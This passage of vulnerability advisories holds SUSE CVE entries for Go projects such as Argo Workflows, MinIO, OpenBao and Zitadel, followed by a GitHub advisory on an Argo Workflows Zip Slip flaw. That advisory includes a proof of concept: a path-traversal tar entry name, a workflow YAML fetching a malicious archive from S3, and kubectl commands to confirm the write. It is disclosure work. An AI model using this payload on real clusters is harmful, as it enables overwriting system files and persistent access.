}
],
"title": "CVE-2025-62156"
},
{
"cve": "CVE-2025-62157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62157"
}
],
"notes": [
{
"category": "general",
"text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Argo Workflows versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 expose artifact repository credentials in plaintext in workflow-controller pod logs. An attacker with permissions to read pod logs in a namespace running Argo Workflows can read the workflow-controller logs and obtain credentials to the artifact repository. Update to versions 3.6.12 or 3.7.3 to remediate the vulnerability. No known workarounds exist.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62157",
"url": "https://www.suse.com/security/cve/CVE-2025-62157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-62157"
},
{
"cve": "CVE-2025-62375",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62375"
}
],
"notes": [
{
"category": "general",
"text": "go-witness and witness are Go modules for generating attestations. In go-witness versions 0.8.6 and earlier and witness versions 0.9.2 and earlier the AWS attestor improperly verifies AWS EC2 instance identity documents. Verification can incorrectly succeed when a signature is not present or is empty, and when RSA signature verification fails. The attestor also embeds a single legacy global AWS public certificate and does not account for newer region specific certificates issued in 2024, making detection of forged documents difficult without additional trusted region data. An attacker able to supply or intercept instance identity document data (such as through Instance Metadata Service impersonation) can cause a forged identity document to be accepted, leading to incorrect trust decisions based on the attestation. This is fixed in go-witness 0.9.1 and witness 0.10.1. As a workaround, manually verify the included identity document, signature, and public key with standard tools (for example openssl) following AWS\u0027s verification guidance, or disable use of the AWS attestor until upgraded.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62375",
"url": "https://www.suse.com/security/cve/CVE-2025-62375"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-62375"
},
{
"cve": "CVE-2025-62506",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62506"
}
],
"notes": [
{
"category": "general",
"text": "MinIO is a high-performance object storage system. In all versions prior to RELEASE.2025-10-15T17-29-55Z, a privilege escalation vulnerability allows service accounts and STS (Security Token Service) accounts with restricted session policies to bypass their inline policy restrictions when performing operations on their own account, specifically when creating new service accounts for the same user. The vulnerability exists in the IAM policy validation logic where the code incorrectly relied on the DenyOnly argument when validating session policies for restricted accounts. When a session policy is present, the system should validate that the action is allowed by the session policy, not just that it is not denied. An attacker with valid credentials for a restricted service or STS account can create a new service account for itself without policy restrictions, resulting in a new service account with full parent privileges instead of being restricted by the inline policy. This allows the attacker to access buckets and objects beyond their intended restrictions and modify, delete, or create objects outside their authorized scope. The vulnerability is fixed in version RELEASE.2025-10-15T17-29-55Z.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62506",
"url": "https://www.suse.com/security/cve/CVE-2025-62506"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-62506"
},
{
"cve": "CVE-2025-62513",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62513"
}
],
"notes": [
{
"category": "general",
"text": "OpenBao is an open source identity-based secrets management system. In versions 2.2.0 to 2.4.1, OpenBao\u0027s audit log experienced a regression wherein raw HTTP bodies used by few endpoints were not correctly redacted (HMAC\u0027d). This impacts those using the ACME functionality of PKI, resulting in short-lived ACME verification challenge codes being leaked in the audit logs. Additionally, this impacts those using the OIDC issuer functionality of the identity subsystem, auth and token response codes along with claims could be leaked in the audit logs. ACME verification codes are not usable after verification or challenge expiry so are of limited long-term use. This issue has been patched in OpenBao 2.4.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62513",
"url": "https://www.suse.com/security/cve/CVE-2025-62513"
},
{
"category": "external",
"summary": "SUSE Bug 1252506 for CVE-2025-62513",
"url": "https://bugzilla.suse.com/1252506"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-62513"
},
{
"cve": "CVE-2025-62705",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62705"
}
],
"notes": [
{
"category": "general",
"text": "OpenBao is an open source identity-based secrets management system. Prior to version 2.4.2, OpenBao\u0027s audit log did not appropriately redact fields when relevant subsystems sent []byte response parameters rather than strings. This includes, but is not limited to sys/raw with use of encoding=base64, all data would be emitted unredacted to the audit log, and Transit, when performing a signing operation with a derived Ed25519 key, would emit public keys to the audit log. This issue has been patched in OpenBao 2.4.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62705",
"url": "https://www.suse.com/security/cve/CVE-2025-62705"
},
{
"category": "external",
"summary": "SUSE Bug 1252505 for CVE-2025-62705",
"url": "https://bugzilla.suse.com/1252505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-62705"
},
{
"cve": "CVE-2025-62714",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62714"
}
],
"notes": [
{
"category": "general",
"text": "Karmada Dashboard is a general-purpose, web-based control panel for Karmada which is a multi-cluster management project. Prior to version 0.2.0, there is an authentication bypass vulnerability in the Karmada Dashboard API. The backend API endpoints (e.g., /api/v1/secret, /api/v1/service) did not enforce authentication, allowing unauthenticated users to access sensitive cluster information such as Secrets and Services directly. Although the web UI required a valid JWT for access, the API itself remained exposed to direct requests without any authentication checks. Any user or entity with network access to the Karmada Dashboard service could exploit this vulnerability to retrieve sensitive data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62714",
"url": "https://www.suse.com/security/cve/CVE-2025-62714"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-62714"
},
{
"cve": "CVE-2025-62725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62725"
}
],
"notes": [
{
"category": "general",
"text": "Docker Compose trusts the path information embedded in remote OCI compose artifacts. When a layer includes the annotations com.docker.compose.extends or com.docker.compose.envfile, Compose joins the attacker-supplied value from com.docker.compose.file/com.docker.compose.envfile with its local cache directory and writes the file there. This affects any platform or workflow that resolves remote OCI compose artifacts, Docker Desktop, standalone Compose binaries on Linux, CI/CD runners, cloud dev environments is affected. An attacker can escape the cache directory and overwrite arbitrary files on the machine running docker compose, even if the user only runs read-only commands such as docker compose config or docker compose ps. This issue is fixed in v2.40.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62725",
"url": "https://www.suse.com/security/cve/CVE-2025-62725"
},
{
"category": "external",
"summary": "SUSE Bug 1252752 for CVE-2025-62725",
"url": "https://bugzilla.suse.com/1252752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-62725"
},
{
"cve": "CVE-2025-62820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62820"
}
],
"notes": [
{
"category": "general",
"text": "Slack Nebula before 1.9.7 mishandles CIDR in some configurations and thus accepts arbitrary source IP addresses within the Nebula network.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62820",
"url": "https://www.suse.com/security/cve/CVE-2025-62820"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-62820"
},
{
"cve": "CVE-2025-64101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64101"
}
],
"notes": [
{
"category": "general",
"text": "Zitadel is open-source identity infrastructure software. Prior to 4.6.0, 3.4.3, and 2.71.18, a potential vulnerability exists in ZITADEL\u0027s password reset mechanism. ZITADEL utilizes the Forwarded or X-Forwarded-Host header from incoming requests to construct the URL for the password reset confirmation link. This link, containing a secret code, is then emailed to the user. If an attacker can manipulate these headers (e.g., via host header injection), they could cause ZITADEL to generate a password reset link pointing to a malicious domain controlled by the attacker. If the user clicks this manipulated link in the email, the secret reset code embedded in the URL can be captured by the attacker. This captured code could then be used to reset the user\u0027s password and gain unauthorized access to their account. It\u0027s important to note that this specific attack vector is mitigated for accounts that have Multi-Factor Authentication (MFA) or Passwordless authentication enabled. This vulnerability is fixed in 4.6.0, 3.4.3, and 2.71.18.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64101",
"url": "https://www.suse.com/security/cve/CVE-2025-64101"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-64101"
},
{
"cve": "CVE-2025-64102",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64102"
}
],
"notes": [
{
"category": "general",
"text": "Zitadel is open-source identity infrastructure software. Prior to 4.6.0, 3.4.3, and 2.71.18, an attacker can perform an online brute-force attack on OTP, TOTP, and passwords. While Zitadel allows preventing online brute force attacks in scenarios like TOTP, Email OTP, or passwords using a lockout mechanism. The mechanism is not enabled by default and can cause a denial of service for the corresponding user if enabled. Additionally, the mitigation strategies were not fully implemented in the more recent resource-based APIs. This vulnerability is fixed in 4.6.0, 3.4.3, and 2.71.18.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64102",
"url": "https://www.suse.com/security/cve/CVE-2025-64102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-64102"
},
{
"cve": "CVE-2025-64103",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64103"
}
],
"notes": [
{
"category": "general",
"text": "Starting from 2.53.6, 2.54.3, and 2.55.0, Zitadel only required multi factor authentication in case the login policy has either enabled requireMFA or requireMFAForLocalUsers. If a user has set up MFA without this requirement, Zitadel would consider single factor auhtenticated sessions as valid as well and not require multiple factors. Bypassing second authentication factors weakens multifactor authentication and enables attackers to bypass the more secure factor. An attacker can target the TOTP code alone, only six digits, bypassing password verification entirely and potentially compromising accounts with 2FA enabled. This vulnerability is fixed in 4.6.0, 3.4.3, and 2.71.18.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64103",
"url": "https://www.suse.com/security/cve/CVE-2025-64103"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-64103"
}
]
}
GHSA-P84V-GXVW-73PF
Vulnerability from github – Published: 2025-10-14 18:00 – Updated: 2025-11-05 22:10
VLAI?
Summary
Argo Workflow has a Zipslip Vulnerability
Details
Vulnerability Description
Vulnerability Overview
- During the artifact extraction process, the
unpack()function extracts the compressed file to a temporary directory (/etc.tmpdir) and then attempts to move its contents to/etcusing therename()system call, - However, since
/etcis an already existing system directory, therename()system call fails, making normal archive extraction impossible. - At this point, if a malicious user sets the entry name inside the
tar.gzfile to a path traversal like../../../../../etc/zipslip-poc, - The
untar()function combines paths usingfilepath.Join(dest, filepath.Clean(header.Name))without path validation, resulting intarget = "/work/input/../../../../../etc/zipslip-poc", - Ultimately, the
/etc/zipslip-pocfile is created, bypassing the normal archive extraction constraints and enabling direct file writing to system directories.
untar(): Writing Files Outside the Extraction Directory
https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993
- Base Path:
/work/tmp(dest) — The intended extraction directory in the wait container - Malicious Entry:
../../../../../../../../../..//mainctrfs/etc/zipslip-ok.txt(header.Name) — Path traversal payload - Path Cleaning:
filepath.Clean("../../../../../../../../../..//mainctrfs/etc/zipslip-ok.txt") = /mainctrfs/etc/zipslip-ok.txt— Go’s path cleaning normalizes the traversal - Path Joining:
filepath.Join("/work/tmp", "/mainctrfs/etc/zipslip-ok.txt") = /mainctrfs/etc/zipslip-ok.txt— Absolute path overrides base directory - File Creation:
/mainctrfs/etc/zipslip-ok.txtfile is created in the wait container - Volume Mirroring: The file appears as
/etc/zipslip-ok.txtin the main container due to volume mount mirroring
PoC
PoC Description
- The user uploaded a malicious
tar.gzfile to S3 that contains path traversal entries like../../../../../../../../../..//mainctrfs/etc/zipslip-ok.txtdesigned to exploit the vulnerability. - In the Argo Workflows YAML, the artifact’s path is set to
/work/tmp, which should normally extract the archive to that intended directory. - However, due to the vulnerability in the
untar()function,filepath.Join("/work/tmp", "/mainctrfs/etc/zipslip-ok.txt")resolves to/mainctrfs/etc/zipslip-ok.txt, causing files to be created in unintended locations. - Since the wait container’s
/mainctrfs/etcand the main container’s/etcshare the same volume, files created in the wait container become visible in the main container’s/etc/directory. - Consequently, the archive that should extract to
/work/tmpexploits the Zip Slip vulnerability to create files in the/etc/directory, enabling manipulation of system configuration files.
exploit yaml
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: zipslip-
spec:
entrypoint: main
templates:
- name: main
container:
image: ubuntu:22.04
command: ["sh"]
args: ["-c", "echo 'Starting container'; sleep 3000"]
volumeMounts:
- name: etcvol
mountPath: /etc
inputs:
artifacts:
- name: evil
path: /work/tmp
archive:
tar: {}
http:
url: "https://zipslip-s3.s3.ap-northeast-2.amazonaws.com/etc-poc.tgz"
volumes:
- name: etcvol
emptyDir: {}
exploit
-
Create Zipslip
-
Upload S3
-
Create Workflow
-
Run
-
Exploit Success
```bash # Find Workflow and Pod NS=default WF=$(kubectl get wf -n "$NS" --sort-by=.metadata.creationTimestamp --no-headers | awk 'END{print $1}') POD=$(kubectl get pod -n "$NS" -l workflows.argoproj.io/workflow="$WF" --no-headers | awk 'END{print $1}') echo "NS=$NS WF=$WF POD=$POD"
# Connect Main Container kubectl exec -it -n "$NS" "$POD" -c main -- bash
# Exploit cd /etc/ ls -l cat zipslip-ok.txt ```
Impact
Container Isolation Bypass
The Zip Slip vulnerability allows attackers to write files to system directories like /etc/ within the container, potentially overwriting critical configuration files such as /etc/passwd, /etc/hosts, or /etc/crontab, which could lead to privilege escalation or persistent access within the compromised container.
Severity ?
8.1 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-workflows/v3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-workflows/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.7.0"
},
{
"fixed": "3.7.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62156"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-14T18:00:30Z",
"nvd_published_at": "2025-10-14T15:16:12Z",
"severity": "HIGH"
},
